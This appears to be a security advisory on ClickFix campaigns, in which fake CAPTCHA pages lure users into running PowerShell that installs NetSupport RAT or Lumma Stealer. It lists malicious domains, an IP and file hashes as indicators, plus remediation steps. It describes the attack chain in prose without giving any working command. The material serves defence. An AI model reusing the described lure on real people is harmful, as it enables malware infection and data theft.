Severity
High
Analysis Summary
Threat actors have increasingly adopted the ClickFix technique since early January 2025 to distribute NetSupport RAT, a remote access trojan (RAT) originally designed as a legitimate IT support tool but now repurposed for cyber espionage.
According to the Researcher, this malware is primarily delivered through fake browser updates and compromised websites, granting attackers full control over the victim’s system. Once installed, NetSupport RAT enables real-time monitoring, file manipulation, and command execution, posing a significant risk to organizations by facilitating data theft, including screenshots, audio, video, and sensitive files.
ClickFix operates by injecting fake CAPTCHA pages into compromised websites, deceiving users into manually copying and executing malicious PowerShell commands, which then download and run NetSupport RAT. eSentire’s analysis revealed that the malware payloads are cleverly concealed within PNG image files hosted on remote servers, allowing for stealthy deployment. This tactic enhances persistence and evasion, making detection more challenging for security tools. The attack chain demonstrates a growing trend of social engineering techniques combined with sophisticated payload delivery mechanisms.
Additionally, the ClickFix technique has been leveraged to propagate a new version of the Lumma Stealer malware, which now utilizes the ChaCha20 encryption algorithm to obscure its configuration file containing command-and-control (C2) server addresses. This evolution highlights the ongoing efforts of cybercriminals to evade detection and forensic analysis by implementing stronger encryption and obfuscation techniques. The continued refinement of such malware delivery methods underscores the need for heightened vigilance and advanced threat detection strategies in cybersecurity defenses.
Impact
- File Manipulation
- Sensitive Data Theft
- Gain Access
Indicators of Compromise
Domain Name
eveverify.com
eiesoft.com
lynxcm.com
incomputersolutions.com
findkik.com
IP
- 92.255.85.135
MD5
9230704646d742931a2e89ae0f187bad
ee75b57b9300aab96530503bfae8a2f2
SHA-256
16a178b33877f9c3219bbe1685bfb879b7c8ab8965dbc734fd49ecb02e8c9d01
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268
SHA1
e23d862807abefae036ddc43e07a0eba46b542c2
98dd757e1c1fa8b5605bda892aa0b82ebefa1f07
Remediation
- Lock all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Deploy endpoint detection and response (EDR) solutions to monitor and block suspicious activities.
- Use network-based intrusion detection systems (IDS) to detect anomalous traffic patterns related to RAT activity.
- Implement web filtering to block access to malicious and compromised websites.
- Regularly update browser security settings to prevent malicious script execution.
- Restrict the execution of PowerShell scripts using Group Policy or allowlisting mechanisms.
- Enable logging for PowerShell commands to detect unauthorized activity.
- Scan for malicious PNG files and other suspicious attachments using advanced malware detection tools.
- Use file integrity monitoring (FIM) to detect unauthorized file modifications.
- Regularly update operating systems, browsers, and security software to mitigate vulnerabilities.
- Disable unnecessary remote administration tools to reduce the attack surface.
- Investigate and isolate compromised systems immediately upon detection.
- Conduct regular threat-hunting exercises to identify hidden infections or persistence mechanisms.
- Monitor and block communication with known NetSupport RAT and Lumma Stealer command-and-control (C2) servers.
- Maintain secure, offline backups of critical data to ensure recovery in case of infection.
- Test backup restoration processes regularly to confirm their effectiveness.